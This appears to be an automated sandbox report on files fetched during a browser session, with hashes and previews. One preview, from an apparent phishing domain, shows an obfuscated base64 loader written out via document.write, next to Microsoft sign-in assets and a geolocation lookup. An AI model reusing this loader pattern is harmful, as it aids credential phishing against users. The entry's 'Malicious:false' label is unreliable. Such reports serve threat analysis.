                                                          Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:downloaded
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://cisco.login.duosecurity.com/static/shared/lib/jquery/jquery.min.js?v=ff152
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (45797)
                                                          Category:dropped
                                                          Size (bytes):406986
                                                          Entropy (8bit):5.31836569617146
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E40761677762EAB0692F86B259C7D744
                                                          SHA1:34A9B50CEC6E1163CEEFCD4D394DB6524C89A854
                                                          SHA-256:DA4A8DF0C326292B5BEE9C732B3C962FD67AAF2F99D850F1BF65068D573C5619
                                                          SHA-512:04FA1D6074AD24E3ABAB53D1DE116A6B39B4BE3DFABC082427F1C5A169E50527561F160CC133C2AC4AEDC4E7AC404572F60E531A4618111EA74D138B2B0DD034
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[8],Array(533).concat([f
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):3.990210155325004
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):18536
                                                          Entropy (8bit):7.986571198050597
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8EFF0B8045FD1959E117F85654AE7770
                                                          SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                          SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                          SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                          Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):1864
                                                          Entropy (8bit):5.222032823730197
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:BC3D32A696895F78C19DF6C717586A5D
                                                          SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                          SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                          SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65467)
                                                          Category:dropped
                                                          Size (bytes):1031383
                                                          Entropy (8bit):5.601481086867173
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:52168FCF464AADE6694EA1594DB4B3A6
                                                          SHA1:B1EBDFD5E268B0FF3ACCDDB3EB79338B46A35E46
                                                          SHA-256:ED19FB1DF0DF3A5AB7FF4DDC1E81EA34AC6F0FBA9455E9D901540F34C83DB9CC
                                                          SHA-512:80498BD65F090E259C20D4C89963CDBF6404EA9E345EE309EB5D2607E0BCBA8F18EB845FC3D8A3F71412E112494A38795908027DAF353CFF57228A3B7A8EA999
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see email-first.js.LICENSE.txt */.!function(){var leafPrototypes,getProto,__webpack_modules__={8865:function(__unused_webpack_module,exports,__webpack_require__){"use strict";__webpack_require__(9129),__webpack_require__(4910),__webpack_require__(3370),__webpack_require__(8815),__webpack_require__(7875),__webpack_require__(8543),__webpack_require__(7313),__webpack_require__(175),__webpack_require__(2698),__webpack_require__(3629),__webpack_require__(8039),__webpack_require__(2203),__webpack_require__(6312),__webpack_require__(9372),__webpack_require__(1661),__webpack_require__(8250),__webpack_require__(2692),__webpack_require__(9317),__webpack_require__(2856),__webpack_require__(5667),__webpack_require__(8463),__webpack_require__(3459),__webpack_require__(9e3),__webpack_require__(8866),__webpack_require__(9607),__webpack_require__(7709),__webpack_require__(6679),__webpack_require__(458),__webpack_require__(1893),__webpack_require__(7793),__webpack_req
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):100
                                                          Entropy (8bit):5.142333850217104
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3A14A805327F77DBF3B8A671A4787EB3
                                                          SHA1:031B86E9C82981CFFC77BC5C46B7B5D841CE3203
                                                          SHA-256:85598AD46120168F1979487D3F6E934912DD9375100A4096863E4D87939584D6
                                                          SHA-512:67EBE8D49ED6AFE5E477F8366A744FBCCB8CFD70AD135FEFCE81C518E1411F22945D9C42DAA57EC157B0C1B651CB3624AD185ECD760B066C1AD7623EA77F149B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlR4k3o23bt4xIFDeeNQA4SBQ3OQUx6?alt=proto
                                                          Preview:CkcKDQ3njUAOGgQIVhgCIAEKNg3OQUx6GgQISxgCKikIClIlChtAISQjKi5fLSUmKz8sXik9KDpbOy8+XTwnflwQARj/////Dw==
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2003)
                                                          Category:downloaded
                                                          Size (bytes):2976
                                                          Entropy (8bit):5.331937284769462
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AF91917885AAE55D96914A09AB4F6E68
                                                          SHA1:D3E84133F4445404DB6F3133C4568A7AC1F7B58D
                                                          SHA-256:EE23DA6E558D1AE67B072B921BB57E2C49DE10DCF6F1A6F7E1D9146DDAE5BAAB
                                                          SHA-512:86630D55789E4B7146E25044C4CC95CE817B3084A8A0F14FFF98BCEBABED42D2D871F74A20B7B752CB27FEAC9CC6F1CBA752BDCB368D0F0750239ED507031F32
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pidpredirect_e74b7f721910c56d695c.js
                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[20],{508:function(e,t,i
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):3
                                                          Entropy (8bit):0.9182958340544896
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D0BD571DC19C083D82F023C9666C5574
                                                          SHA1:3E774731D33D9224AC36AF3D85BA1F81B31BC84D
                                                          SHA-256:D6B5915C46057BCB005F46F6433DF65609DD3A7A57AF75AC1A5A4A7C299EBFFB
                                                          SHA-512:C5E6686FE91CA1B71AB014588C517B18B4CC9F46DCB8F43EAA3D386A4CB9BFD7600B97462354D7B3319294D9AE1591F7DC6C2135B72DAB9DDBDEA892758D547E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://formapi.questionscout.com/socket.io/?fingerprint=be9ae3c9e5dfc39574592ff51220972d&EIO=3&transport=polling&t=PCQFtL6&sid=-K8yAYerUfxxPeoPCV9H
                                                          Preview:1:1
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):103
                                                          Entropy (8bit):5.069582143869378
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B74E8B4A8D2C081034CE0F900261FF9E
                                                          SHA1:2D7C75D2FD80A2231174A6FFE904C7C6AC74B25E
                                                          SHA-256:EA0AD9F0606F17BB09B230F91E00BA7F15F8C2B7D1EB23722C520CEE26E7D6E9
                                                          SHA-512:F2B60E75C43D7B2267F18D12324719AD8A2747F1EAC03596F8FCD4DF476F4548FDB9F915081B72692D76F94C06CCC1602634203DF273D1604968FFBD73503EED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:96:0{"sid":"ZkXuPF52-WYiMFMmCV9J","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":5000}2:40
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (5501), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):16014
                                                          Entropy (8bit):5.9340033734187125
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3468E0A13166629075C93FA8A0BEB087
                                                          SHA1:99B3DC9A5C2B6F7156C0EFDEADFAF9400BAC4E31
                                                          SHA-256:E76870FB9F8A9C777E9C560BD0FE44ED356CAA86D017A9949AD83135C5D1AFDA
                                                          SHA-512:DD9E40E83DAC76ADE769D0A24ACFBF052A56FC6BF255808E9DB4F77389AA5CBD543C5B7D06E463814CD867BC23406BA4420C111E6AF37FF4784ECF065A514B5C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://adi.actinkaeophl.com/tOaA22/
                                                          Preview: Success is not final, failure is not fatal: It is the courage to continue that counts. -->..<script>../* The only place where success comes before work is in the dictionary. */..if(atob("aHR0cHM6Ly9BREkuYWN0aW5rYWVvcGhsLmNvbS90T2FBMjIv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dG
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (14782)
                                                          Category:dropped
                                                          Size (bytes):15755
                                                          Entropy (8bit):5.366543080044668
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:630831903F4BA9060856520624E34CFC
                                                          SHA1:36DC15B9CCC3FC8EF627354BF55EF44EBD10E203
                                                          SHA-256:BC6804D058D5BD5B24FC04E479FC8973BEF5D3EFEAFAA9C19C60A009BF0FAC0B
                                                          SHA-512:1B0759972BBAB0B1A11D54849051E6782600B74FADB1CAF1BD58D214F484E35154907CA7F396EDB1C81A7CDC6F264D138267FB58FD89E1BA3A4D67366EE7E8B0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{519:function(e,n,s
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):164
                                                          Entropy (8bit):4.806060601376512
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4547A5504E0FDCE580231EBA6F154BD1
                                                          SHA1:1C9175ABE95D4260A6972C4CA9300264856BB8DB
                                                          SHA-256:4721687CEF54AFB884901DA1255D7D5255F2B032724457C19240F5EC2CB3421B
                                                          SHA-512:A83D3AE3C5755879B5516B47932824317F6EE2C917C2C8D8FA9A711FEF1701A75F5957B3A78CB062F7C80D06A1CC95F6152AAE0CEFF96BDC33F4A94589389CC6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://geolocation-db.com/json/697de680-a737-11ea-9820-af05f4014d91
                                                          Preview:{"country_code":"US","country_name":"United States","city":"Dallas","postal":"75201","latitude":32.7904,"longitude":-96.8044,"IPv4":"66.23.206.109","state":"Texas"}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):103
                                                          Entropy (8bit):5.092132473933785
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:796DAA810F5CF6C2EF5784AE0359C86B
                                                          SHA1:FC5EA41DA80D0D1DE97F2BC3DE4EEA1E25DDD1DC
                                                          SHA-256:66F27B2161BF2169346951DBDBC1A6BAE54BD12CF8192DF7C0B90EC1D47843FD
                                                          SHA-512:CB4C962D245C041BA94C0331A2E7619E1E042455430D901D9EE58C0597DDCE9F8044FD2F3152DE4B5951093EC5F93E956D5D906157EDE7A0737A99DAEE814CFD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://formapi.questionscout.com/socket.io/?fingerprint=be9ae3c9e5dfc39574592ff51220972d&EIO=3&transport=polling&t=PCQFt4V
                                                          Preview:96:0{"sid":"-K8yAYerUfxxPeoPCV9H","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":5000}2:40
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):48316
                                                          Entropy (8bit):5.6346993394709
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (47671)
                                                          Category:dropped
                                                          Size (bytes):47672
                                                          Entropy (8bit):5.401921124762015
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B804BCD42117B1BBE45326212AF85105
                                                          SHA1:7B4175AAF0B7E45E03390F50CB8ED93185017014
                                                          SHA-256:B7595C3D2E94DF7416308FA2CCF5AE8832137C76D2E9A8B02E6ED2CB2D92E2F7
                                                          SHA-512:9A4F038F9010DDCCF5E0FAF97102465EF7BA27B33F55C4B86D167C41096DB1E76C8212A5E36565F0447C4F57340A10DB07BB9AE26982DFFF92C411B5B1F1FB97
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function g(u){Ht(l,o,c,g,h,"next",u)}function h(u){Ht(l,o,c,g,h,"throw",u)}g(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                          Category:downloaded
                                                          Size (bytes):3452
                                                          Entropy (8bit):5.117912766689607
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:CB06E9A552B197D5C0EA600B431A3407
                                                          SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                          SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                          SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://login.live.com/Me.htm?v=3
                                                          Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):103
                                                          Entropy (8bit):5.084240153620126
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E89C5B6AA8C0DF9D9C7DECC29FA064F1
                                                          SHA1:42D4305341736FBE98240EDD0EBBE56603F8C1FF
                                                          SHA-256:342C3E54D1DBC51959004577A9E984AD6B10D382646BB917B0E2786E63672733
                                                          SHA-512:0454F70151369E782EA82205F96C964B00CB5215AE86EAC5B9252864FAD9233EA7118F58D59027952113C151CE92D54E99C15CDB44E287C3660ECC445AB582B2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://formapi.questionscout.com/socket.io/?fingerprint=be9ae3c9e5dfc39574592ff51220972d&EIO=3&transport=polling&t=PCQFyMF
                                                          Preview:96:0{"sid":"DlWnNiaXDkjlqYS3CV9P","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":5000}2:40
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):18588
                                                          Entropy (8bit):7.988601596032928
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:115C2D84727B41DA5E9B4394887A8C40
                                                          SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                          SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                          SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
